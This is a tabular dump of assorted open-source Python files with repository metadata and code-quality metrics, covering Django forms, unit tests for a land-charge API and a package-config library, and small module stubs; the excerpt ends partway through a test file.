hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cf7a48242cc262b8b8471ee7441d783064259b3a
| 300
|
py
|
Python
|
yeast/core/media/sc/__init__.py
|
irahorecka/sga-fba
|
fc7e923da8e79555780359f018c85b5e5339d8d0
|
[
"MIT"
] | null | null | null |
yeast/core/media/sc/__init__.py
|
irahorecka/sga-fba
|
fc7e923da8e79555780359f018c85b5e5339d8d0
|
[
"MIT"
] | null | null | null |
yeast/core/media/sc/__init__.py
|
irahorecka/sga-fba
|
fc7e923da8e79555780359f018c85b5e5339d8d0
|
[
"MIT"
] | null | null | null |
from yeast.core.media.sc.base import sc
from yeast.core.media.sc.sc_no_ade import sc_no_ade
from yeast.core.media.sc.sc_no_arg import sc_no_arg
from yeast.core.media.sc.sc_no_ino import sc_no_ino
from yeast.core.media.sc.sc_no_lys import sc_no_lys
from yeast.core.media.sc.sc_no_met import sc_no_met
| 42.857143
| 51
| 0.84
| 68
| 300
| 3.411765
| 0.191176
| 0.172414
| 0.336207
| 0.465517
| 0.603448
| 0.517241
| 0.517241
| 0
| 0
| 0
| 0
| 0
| 0.08
| 300
| 6
| 52
| 50
| 0.84058
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d8939b69dac88606f611a416132228994f516d92
| 165
|
py
|
Python
|
frappe/core/doctype/file/exceptions.py
|
FHenry/frappe
|
b1e97c1ff489aa28f1b28f681453f42ecc846254
|
[
"MIT"
] | null | null | null |
frappe/core/doctype/file/exceptions.py
|
FHenry/frappe
|
b1e97c1ff489aa28f1b28f681453f42ecc846254
|
[
"MIT"
] | null | null | null |
frappe/core/doctype/file/exceptions.py
|
FHenry/frappe
|
b1e97c1ff489aa28f1b28f681453f42ecc846254
|
[
"MIT"
] | null | null | null |
import frappe
class MaxFileSizeReachedError(frappe.ValidationError):
pass
class FolderNotEmpty(frappe.ValidationError):
pass
from frappe.exceptions import *
| 12.692308
| 54
| 0.818182
| 16
| 165
| 8.4375
| 0.5625
| 0.311111
| 0.37037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 165
| 12
| 55
| 13.75
| 0.931034
| 0
| 0
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 6
|
d8a7ce4390e332127143c70ee55f93238d9c82a0
| 115
|
py
|
Python
|
pelican/plugins/bibliography/test_bibliography.py
|
micahjsmith/pelican-bibliography
|
b612fa9d3be5dcf7300fe4b90d25dc2de3778e30
|
[
"MIT"
] | 3
|
2021-02-18T20:27:29.000Z
|
2022-01-24T16:21:52.000Z
|
pelican/plugins/bibliography/test_bibliography.py
|
micahjsmith/pelican-bibliography
|
b612fa9d3be5dcf7300fe4b90d25dc2de3778e30
|
[
"MIT"
] | null | null | null |
pelican/plugins/bibliography/test_bibliography.py
|
micahjsmith/pelican-bibliography
|
b612fa9d3be5dcf7300fe4b90d25dc2de3778e30
|
[
"MIT"
] | null | null | null |
from pelican.plugins.bibliography import __version__
def test_version():
assert isinstance(__version__, str)
| 19.166667
| 52
| 0.8
| 13
| 115
| 6.384615
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130435
| 115
| 5
| 53
| 23
| 0.83
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
2b03bff91cbb0e4eb51750a27331565d4b489454
| 7,602
|
py
|
Python
|
todoes/forms_rus.py
|
Ishayahu/MJCC-tasks
|
68ea00dab543e6e4e0f6cf6b6683f3719bb6f3c0
|
[
"MIT"
] | 1
|
2017-09-25T09:36:46.000Z
|
2017-09-25T09:36:46.000Z
|
todoes/forms_rus.py
|
Ishayahu/MJCC-tasks
|
68ea00dab543e6e4e0f6cf6b6683f3719bb6f3c0
|
[
"MIT"
] | 40
|
2015-05-29T11:25:15.000Z
|
2015-08-13T10:28:17.000Z
|
todoes/forms_rus.py
|
Ishayahu/MJCC-tasks
|
68ea00dab543e6e4e0f6cf6b6683f3719bb6f3c0
|
[
"MIT"
] | null | null | null |
# -*- coding:utf-8 -*-
# coding=<utf8>
#TODO: сделать английские формы
from django import forms
from django.forms import ModelForm
from todoes.models import Note, Resource, File, Person, Task,\
ProblemByWorker, ProblemByUser, Categories, Message
# from tasks.todoes.models import Worker, Client
from django.contrib.auth.forms import UserCreationForm
from django.contrib.admin import widgets
PRIORITY_CHOICES = (
('1','Лазар/Борода/Мотя'),
('2','Если не сделать сейчас - огребём проблем потом'),
('3','Всё остальное'),
('4','В ближайшем будущем'),
('5','Когда время будет')
)
inp_f=( '%d-%m-%Y %H:%M:%S', # '2006-10-25 14:30:59'
'%d-%m-%Y %H:%M', # '2006-10-25 14:30'
'%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30'
'%d-%m-%Y', # '2006-10-25'
'%d/%m/%Y %H:%M:%S', # '10/25/2006 14:30:59'
'%d/%m/%Y %H:%M', # '10/25/2006 14:30'
'%d/%m/%Y', # '10/25/2006'
'%d.%m.%Y %H:%M:%S', # '10/25/2006 14:30:59'
'%Y.%m.%d %H:%M:%S', # '2010/01/26 14:30:59'
'%d/%m/%y %H:%M:%S', # '10/25/06 14:30:59'
'%d/%m/%y %H:%M', # '10/25/06 14:30'
'%d/%m/%y', )
class NewTicketForm_RUS(forms.Form):
name = forms.CharField(max_length=140, label='Название заявки')
pbus = forms.ModelChoiceField(queryset = ProblemByUser.objects.all(), label='Проблема со слов пользователя')
description = forms.CharField(widget=forms.Textarea, label='Описание')
clients = forms.ModelChoiceField(queryset = Person.objects.all(), label='Заявитель')
priority = forms.ChoiceField(widget=forms.RadioSelect,choices = PRIORITY_CHOICES, label='Приоритет')
category = forms.ModelChoiceField(queryset = Categories.objects.all(), label='Категория')
start_date = forms.DateTimeField(label='Дата создания заявки')
due_date = forms.DateTimeField(label='Предполагаемая дата завершения',input_formats=inp_f)
workers = forms.ModelChoiceField(queryset = Person.objects.all(), label='Исполнитель')
percentage = forms.DecimalField(min_value=0, max_value=100, label='Процент выполнения')
file = forms.FileField(label="Прикрепить файл", required=False)
class TicketEditForm_RUS(forms.Form):
name = forms.CharField(max_length=140, label='Название заявки')
pbus = forms.ModelChoiceField(queryset = ProblemByUser.objects.all(), label='Проблема со слов пользователя')
description = forms.CharField(widget=forms.Textarea, label='Описание')
clients = forms.ModelChoiceField(queryset = Person.objects.all(), label='Заявитель')
priority = forms.ChoiceField(choices = PRIORITY_CHOICES, label='Приоритет')
category = forms.ModelChoiceField(queryset = Categories.objects.all(), label='Категория')
start_date = forms.DateTimeField(label='Дата создания заявки',input_formats=inp_f)
when_to_reminder = forms.DateTimeField(label='Установить напоминание',input_formats=inp_f,required=False)
due_date = forms.DateTimeField(label='Предполагаемая дата завершения',input_formats=inp_f)
workers = forms.ModelChoiceField(queryset = Person.objects.all(), label='Исполнитель')
percentage = forms.DecimalField(min_value=0, max_value=100, label='Процент выполнения')
file = forms.FileField(label="Прикрепить файл", required=False)
class NewRegularTicketForm_RUS(forms.Form):
name = forms.CharField(max_length=140, label='Название заявки')
description = forms.CharField(widget=forms.Textarea, label='Описание',required=False)
clients = forms.ModelChoiceField(queryset = Person.objects.all(), label='Заявитель')
priority = forms.ChoiceField(widget=forms.RadioSelect,choices = PRIORITY_CHOICES, label='Приоритет')
category = forms.ModelChoiceField(queryset = Categories.objects.all(), label='Категория')
start_date = forms.DateTimeField(label='Дата создания заявки',input_formats=inp_f)
stop_date = forms.DateTimeField(label='Дата завершения',input_formats=inp_f,required=False)
workers = forms.ModelChoiceField(queryset = Person.objects.all(), label='Исполнитель')
class EditRegularTicketForm_RUS(forms.Form):
name = forms.CharField(max_length=140, label='Название заявки')
description = forms.CharField(widget=forms.Textarea, label='Описание',required=False)
clients = forms.ModelChoiceField(queryset = Person.objects.all(), label='Заявитель')
priority = forms.ChoiceField(widget=forms.RadioSelect,choices = PRIORITY_CHOICES, label='Приоритет')
category = forms.ModelChoiceField(queryset = Categories.objects.all(), label='Категория')
start_date = forms.DateTimeField(label='Дата создания заявки',input_formats=inp_f)
when_to_reminder = forms.DateTimeField(label='Установить напоминание',input_formats=inp_f,required=False)
stop_date = forms.DateTimeField(label='Дата завершения',input_formats=inp_f,required=False)
workers = forms.ModelChoiceField(queryset = Person.objects.all(), label='Исполнитель')
class TicketClosingForm_RUS(forms.Form):
done_date = forms.DateTimeField(label='Дата закрытия заявки',input_formats=inp_f)
pbw = forms.ModelChoiceField(queryset = ProblemByWorker.objects.all(), label='Выявленная проблема')
class TicketConfirmingForm_RUS(forms.Form):
confirmed = forms.BooleanField(required=False)
confirmed_date = forms.DateTimeField(label='Дата подтверждения закрытия заявки',input_formats=inp_f)
# class NoteToTicketAddForm(forms.Form):
# note = forms.CharField(widget=forms.Textarea, label='Комментарий',required=False )
# workers = forms.ModelMultipleChoiceField(queryset = Person.objects.all(), label='Кого ещё уведомить о комментарии?',required=False)
class UserCreationFormMY(UserCreationForm):
fio = forms.CharField(label='ФИО')
mail = forms.EmailField(label = 'Мыло')
tel = forms.CharField(label='Телефон', max_length=10, min_length=10)
class TicketSearchForm_RUS(forms.Form):
name = forms.CharField(max_length=140, label='Текст для поиска')
class NoteToTicketAddForm_RUS(forms.Form):
def __init__(self, *args, **kwargs):
self.defaults = kwargs.pop('defaults','')
self.exclude = kwargs.pop('exclude','')
super(NoteToTicketAddForm_RUS, self).__init__(*args, **kwargs)
self.fields['workers'].queryset = Person.objects.exclude(fio__in = [person.fio for person in self.exclude ])
self.fields['workers'].initial = Person.objects.filter(fio__in = self.defaults)
note = forms.CharField(widget=forms.Textarea, label='Комментарий',required=False )
workers = forms.ModelMultipleChoiceField(queryset = Person.objects.all(), label='Кого ещё уведомить о комментарии?',required=False,)
class File_and_NoteToTicketAddForm_RUS(forms.Form):
def __init__(self, *args, **kwargs):
self.defaults = kwargs.pop('defaults','')
self.exclude = kwargs.pop('exclude','')
super(File_and_NoteToTicketAddForm_RUS, self).__init__(*args, **kwargs)
self.fields['workers'].queryset = Person.objects.exclude(fio__in = [person.fio for person in self.exclude ])
self.fields['workers'].initial = Person.objects.filter(fio__in = self.defaults)
note = forms.CharField(widget=forms.Textarea, label='Комментарий',required=False )
file = forms.FileField()
workers = forms.ModelMultipleChoiceField(queryset = Person.objects.all(), label='Кого ещё уведомить о комментарии?',required=False,)
class NewMessageForm(ModelForm):
class Meta:
model = Message
fields = ['name', 'text',]
# localized_fields = ['name', 'text',]
| 59.858268
| 138
| 0.708498
| 918
| 7,602
| 5.765795
| 0.204793
| 0.034007
| 0.051011
| 0.049877
| 0.798791
| 0.780087
| 0.766484
| 0.766484
| 0.756471
| 0.756471
| 0
| 0.025309
| 0.147593
| 7,602
| 127
| 139
| 59.858268
| 0.791512
| 0.080374
| 0
| 0.5
| 0
| 0
| 0.161216
| 0
| 0
| 0
| 0
| 0.007874
| 0
| 1
| 0.019231
| false
| 0
| 0.048077
| 0
| 0.692308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
2b731f45f823653585a0f413f9abb22a2de67485
| 4,669
|
py
|
Python
|
unit_tests/test_update_land_charge.py
|
LandRegistry/maintain-api
|
fa1ecf71332b47606293c59eeaed8ae43d5231cd
|
[
"MIT"
] | null | null | null |
unit_tests/test_update_land_charge.py
|
LandRegistry/maintain-api
|
fa1ecf71332b47606293c59eeaed8ae43d5231cd
|
[
"MIT"
] | null | null | null |
unit_tests/test_update_land_charge.py
|
LandRegistry/maintain-api
|
fa1ecf71332b47606293c59eeaed8ae43d5231cd
|
[
"MIT"
] | 1
|
2021-04-11T05:25:02.000Z
|
2021-04-11T05:25:02.000Z
|
from unittest import TestCase
from unittest.mock import patch, MagicMock
from maintain_api.main import app
import json
RESPONSE_SUCCESS = {
"entry_number": 1,
"local-land-charge": 2
}
class TestUpdateLandCharge(TestCase):
def setUp(self):
self.app = app.test_client()
self.jwt_patcher = patch("maintain_api.app.validate")
self.mock_jwt_validate = self.jwt_patcher.start()
def tearDown(self):
self.jwt_patcher.stop()
@patch('maintain_api.views.v1_0.update_land_charge.current_app')
@patch('maintain_api.views.v1_0.update_land_charge.MintApiService')
@patch('maintain_api.views.v1_0.update_land_charge.SearchApiService')
def test_update_charge(self, mock_search_api_service, mock_mint_api_service, mock_current_app):
response = MagicMock()
response.status_code = 200
mock_search_api_service.get_by_charge_number.return_value = response
mock_mint_api_service.add_to_register.return_value = RESPONSE_SUCCESS, 202
headers = {'Content-Type': 'application/json', 'Authorization': 'NOTAREALJWT'}
payload_json = {"local-land-charge": 123, "registration-date": "2012-10-10"}
result = self.app.put('/v1.0/maintain/local-land-charge/123', data=json.dumps(payload_json), headers=headers)
mock_current_app.logger.performance_platform.assert_called_with(
"Successfully updated charge '123'"
)
result_json = json.loads(result.data.decode('utf-8'))
self.assertEqual(result.status_code, 202)
self.assertEqual(result_json, {'entry_number': 1, 'land_charge_id': 2, 'registration_date': '2012-10-10'})
@patch('maintain_api.views.v1_0.update_land_charge.current_app')
@patch('maintain_api.views.v1_0.update_land_charge.MintApiService')
@patch('maintain_api.views.v1_0.update_land_charge.SearchApiService')
def test_cancel_charge(self, mock_search_api_service, mock_mint_api_service, mock_current_app):
response = MagicMock()
response.status_code = 200
mock_search_api_service.get_by_charge_number.return_value = response
mock_mint_api_service.add_to_register.return_value = RESPONSE_SUCCESS, 202
headers = {'Content-Type': 'application/json', 'Authorization': 'NOTAREALJWT'}
payload_json = {"local-land-charge": 123, "registration-date": "2012-10-10", "end-date": "2020-10-10"}
result = self.app.put('/v1.0/maintain/local-land-charge/123', data=json.dumps(payload_json), headers=headers)
mock_current_app.logger.performance_platform.assert_called_with(
"Successfully cancelled charge '123'"
)
result_json = json.loads(result.data.decode('utf-8'))
self.assertEqual(result.status_code, 202)
self.assertEqual(result_json, {'entry_number': 1, 'land_charge_id': 2, 'registration_date': '2012-10-10'})
@patch('maintain_api.views.v1_0.update_land_charge.current_app')
def test_update_charge_nomatch(self, mock_current_app):
headers = {'Content-Type': 'application/json', 'Authorization': 'NOTAREALJWT'}
payload_json = {"local-land-charge": 123, "registration-date": "2012-10-10"}
result = self.app.put('/v1.0/maintain/local-land-charge/1234', data=json.dumps(payload_json), headers=headers)
self.assertEqual(mock_current_app.logger.performance_platform.mock_calls, [])
result_json = json.loads(result.data.decode('utf-8'))
self.assertEqual(result.status_code, 400)
self.assertEqual(result_json, {'error_code': 'U100',
'error_message': 'Cannot change local-land-charge field'})
@patch('maintain_api.views.v1_0.update_land_charge.current_app')
@patch('maintain_api.views.v1_0.update_land_charge.SearchApiService')
def test_charge_not_found(self, mock_search_api_service, mock_current_app):
response = MagicMock()
response.status_code = 404
mock_search_api_service.get_by_charge_number.return_value = response
headers = {'Content-Type': 'application/json', 'Authorization': 'NOTAREALJWT'}
payload_json = {"local-land-charge": 123, "registration-date": "2012-10-10"}
result = self.app.put('/v1.0/maintain/local-land-charge/123', data=json.dumps(payload_json), headers=headers)
self.assertEqual(mock_current_app.logger.performance_platform.mock_calls, [])
result_json = json.loads(result.data.decode('utf-8'))
self.assertEqual(result.status_code, 400)
self.assertEqual(result_json, {'error_code': 'U101',
'error_message': 'Cannot find local land charge'})
| 51.307692
| 118
| 0.707004
| 600
| 4,669
| 5.216667
| 0.173333
| 0.070288
| 0.052716
| 0.060383
| 0.836102
| 0.836102
| 0.831629
| 0.831629
| 0.831629
| 0.831629
| 0
| 0.040154
| 0.167916
| 4,669
| 90
| 119
| 51.877778
| 0.765508
| 0
| 0
| 0.589041
| 0
| 0
| 0.304562
| 0.144999
| 0
| 0
| 0
| 0
| 0.164384
| 1
| 0.082192
| false
| 0
| 0.054795
| 0
| 0.150685
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2b73e8328f84763fd28db80ccfac318a0bc38586
| 66
|
py
|
Python
|
test/run/t236.py
|
timmartin/skulpt
|
2e3a3fbbaccc12baa29094a717ceec491a8a6750
|
[
"MIT"
] | 2,671
|
2015-01-03T08:23:25.000Z
|
2022-03-31T06:15:48.000Z
|
test/run/t236.py
|
csev/skulpt
|
9aa25b7dbf29f23ee8d3140d01a6f4353d12e66f
|
[
"MIT"
] | 972
|
2015-01-05T08:11:00.000Z
|
2022-03-29T13:47:15.000Z
|
test/run/t236.py
|
csev/skulpt
|
9aa25b7dbf29f23ee8d3140d01a6f4353d12e66f
|
[
"MIT"
] | 845
|
2015-01-03T19:53:36.000Z
|
2022-03-29T18:34:22.000Z
|
import pkga.pkgb.modc as c_me
print c_me.stuff
print c_me.things
| 13.2
| 29
| 0.80303
| 15
| 66
| 3.333333
| 0.666667
| 0.18
| 0.32
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136364
| 66
| 4
| 30
| 16.5
| 0.877193
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.333333
| null | null | 0.666667
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
9947266f4917ae4fc8647a6efe042cf5ee41e71a
| 27
|
py
|
Python
|
desktop/core/ext-py/nose-1.3.7/functional_tests/test_issue120/support/some_test.py
|
kokosing/hue
|
2307f5379a35aae9be871e836432e6f45138b3d9
|
[
"Apache-2.0"
] | 5,079
|
2015-01-01T03:39:46.000Z
|
2022-03-31T07:38:22.000Z
|
desktop/core/ext-py/nose-1.3.7/functional_tests/test_issue120/support/some_test.py
|
zks888/hue
|
93a8c370713e70b216c428caa2f75185ef809deb
|
[
"Apache-2.0"
] | 1,623
|
2015-01-01T08:06:24.000Z
|
2022-03-30T19:48:52.000Z
|
desktop/core/ext-py/nose-1.3.7/functional_tests/test_issue120/support/some_test.py
|
zks888/hue
|
93a8c370713e70b216c428caa2f75185ef809deb
|
[
"Apache-2.0"
] | 2,033
|
2015-01-04T07:18:02.000Z
|
2022-03-28T19:55:47.000Z
|
def some_test():
pass
| 6.75
| 16
| 0.592593
| 4
| 27
| 3.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.296296
| 27
| 3
| 17
| 9
| 0.789474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
994d52b2c733016d59725a5f4ba1f81028bf6eec
| 5,483
|
py
|
Python
|
test/unit/test_package_defaults.py
|
jimporter/mopack
|
e912be11528645f5463e7873b5470c420b698418
|
[
"BSD-3-Clause"
] | null | null | null |
test/unit/test_package_defaults.py
|
jimporter/mopack
|
e912be11528645f5463e7873b5470c420b698418
|
[
"BSD-3-Clause"
] | 17
|
2020-07-23T20:28:36.000Z
|
2022-03-04T04:33:55.000Z
|
test/unit/test_package_defaults.py
|
jimporter/mopack
|
e912be11528645f5463e7873b5470c420b698418
|
[
"BSD-3-Clause"
] | 1
|
2020-11-04T03:51:20.000Z
|
2020-11-04T03:51:20.000Z
|
from unittest import mock, TestCase
from mopack.package_defaults import DefaultConfig, _get_default_config
from mopack.yaml_tools import YamlParseError
def mock_open(read_data):
return mock.mock_open(read_data=read_data)
class TestDefaultConfig(TestCase):
def test_string_field(self):
data = 'source:\n foo:\n field: value'
with mock.patch('builtins.open', mock_open(data)):
cfg = DefaultConfig('file.yml')
self.assertEqual(cfg.get({}, 'source', 'foo', 'field'), 'value')
self.assertEqual(cfg.get({}, 'source', 'foo', 'other'), None)
self.assertEqual(cfg.get({}, 'source', 'foo', 'other', 'default'),
'default')
self.assertEqual(cfg.get({}, 'source', 'bar', 'field'), None)
self.assertEqual(cfg.get({}, 'source', 'bar', 'field', 'default'),
'default')
self.assertEqual(cfg.get({}, 'usage', 'foo', 'field'), None)
self.assertEqual(cfg.get({}, 'usage', 'foo', 'field', 'default'),
'default')
def test_list_field(self):
data = 'source:\n foo:\n field: [1, 2]'
with mock.patch('builtins.open', mock_open(data)):
cfg = DefaultConfig('file.yml')
self.assertEqual(cfg.get({}, 'source', 'foo', 'field'), [1, 2])
self.assertEqual(cfg.get({}, 'source', 'foo', 'other'), None)
self.assertEqual(cfg.get({}, 'source', 'foo', 'other', []), [])
self.assertEqual(cfg.get({}, 'source', 'bar', 'field'), None)
self.assertEqual(cfg.get({}, 'source', 'bar', 'field', []), [])
def test_dict_field(self):
data = 'source:\n foo:\n field: {goat: 1, panda: 2}'
with mock.patch('builtins.open', mock_open(data)):
cfg = DefaultConfig('file.yml')
self.assertEqual(cfg.get({}, 'source', 'foo', 'field'),
{'goat': 1, 'panda': 2})
self.assertEqual(cfg.get({}, 'source', 'foo', 'other'), None)
self.assertEqual(cfg.get({}, 'source', 'foo', 'other', {}), {})
self.assertEqual(cfg.get({}, 'source', 'bar', 'field'), None)
self.assertEqual(cfg.get({}, 'source', 'bar', 'field', {}), {})
def test_expr_field(self):
data = 'source:\n foo:\n field: $variable'
with mock.patch('builtins.open', mock_open(data)):
cfg = DefaultConfig('file.yml')
symbols = {'variable': 'goat'}
self.assertEqual(cfg.get(symbols, 'source', 'foo', 'field'), 'goat')
self.assertEqual(cfg.get(symbols, 'source', 'bar', 'field'), None)
symbols = {'variable': 'panda'}
self.assertEqual(cfg.get(symbols, 'source', 'foo', 'field'), 'panda')
self.assertEqual(cfg.get(symbols, 'source', 'bar', 'field'), None)
def test_conditional(self):
data = 'source:\n foo:\n - if: true\n field: goat'
with mock.patch('builtins.open', mock_open(data)):
cfg = DefaultConfig('file.yml')
self.assertEqual(cfg.get({}, 'source', 'foo', 'field'), 'goat')
self.assertEqual(cfg.get({}, 'source', 'bar', 'field'), None)
data = 'source:\n foo:\n - if: false\n field: goat'
with mock.patch('builtins.open', mock_open(data)):
cfg = DefaultConfig('file.yml')
self.assertEqual(cfg.get({}, 'source', 'foo', 'field'), None)
self.assertEqual(cfg.get({}, 'source', 'bar', 'field'), None)
def test_conditional_expr(self):
data = ('source:\n foo:\n - if: variable == true\n' +
' field: goat\n - field: panda')
with mock.patch('builtins.open', mock_open(data)):
cfg = DefaultConfig('file.yml')
symbols = {'variable': True}
self.assertEqual(cfg.get(symbols, 'source', 'foo', 'field'), 'goat')
self.assertEqual(cfg.get(symbols, 'source', 'bar', 'field'), None)
symbols = {'variable': False}
self.assertEqual(cfg.get(symbols, 'source', 'foo', 'field'), 'panda')
